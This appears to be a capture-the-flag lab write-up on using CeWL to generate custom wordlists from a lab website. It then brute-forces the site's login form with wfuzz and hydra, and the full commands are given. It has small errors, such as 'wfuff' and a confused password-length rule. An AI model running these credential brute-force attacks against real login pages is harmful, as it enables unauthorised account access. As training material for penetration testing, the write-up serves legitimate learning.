🦀[Day 4] Brute-forcing Baby, it's CeWLd outside

Learning Objectives

• What is CeWL?

• What are the capabilities of CeWL?

• How can we leverage CeWL to generate a custom wordlist from a website?

• How can we customise the tool's output for specific tasks?

Overview

CeWL (pronounced "cool") is a custom word list generator tool that spiders websites to create word lists based on the site's content. Spidering, in the context of web security and penetration testing, refers to the process of automatically navigating and cataloguing a website's content, often to retrieve the site structure, content, and other relevant details. This capability makes CeWL especially valuable to penetration testers aiming to brute-force login pages or uncover hidden directories using organisation-specific terminology.

Beyond simple wordlist generation, CeWL can also compile a list of email addresses or usernames identified in team members' page links. Such data can then serve as potential usernames in brute-force operations.

How To Customise the Output for Specific Tasks

CeWL provides a lot of options that allow you to tailor the wordlist to your needs:

1. Specify spidering depth: The -d option allows you to set how deep CeWL should spider. For example, to spider two links deep: cewl http://10.10.253.172 -d 2 -w output1.txt

2. Set minimum and maximum word length: Use the -m and -x options respectively. For instance, to get words between 5 and 10 characters: cewl http://10.10.253.172 -m 5 -x 10 -w output2.txt

3. Handle authentication: If the target site is behind a login, you can use the -a flag for form-based authentication.

4. Custom extensions: The --with-numbers option will append numbers to words, and using --extension allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.

5. Follow external links: By default, CeWL doesn't spider external sites, but using the --offsite option allows you to do so.

Solution

Visiting the page, we can get some juicy information where it have directory to employee portal and some of "magic words" might be use for password.

1. Assume the length of password not more than 5 and depth 2. ( Example Given)

cewl -d 2 -m 5 -w passwords.txt http://IP --with-numbers

1. We got page for employee name, which have maximum 6 character.

cewl -d 0 -m 5 -w usernames.txt http://IP/team.php --lowercase

1. We have username and password. Instead using hydra,, this time I will use wfuff.

wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://IP/login.php -d "username=FUZZ&password=FUZ2Z"

-z = use to load the file, Sytanx (type,name).

-hs = Prompt message that appear every failed attempt.

-u = URL / targeted.

-d = data being send.

Hydra Attack.

hydra -L usernames.txt -P passwords.txt -f -v IP http-post-form "/login.php:username=^USER^&&password=^PASS^:Please enter the correct credentials"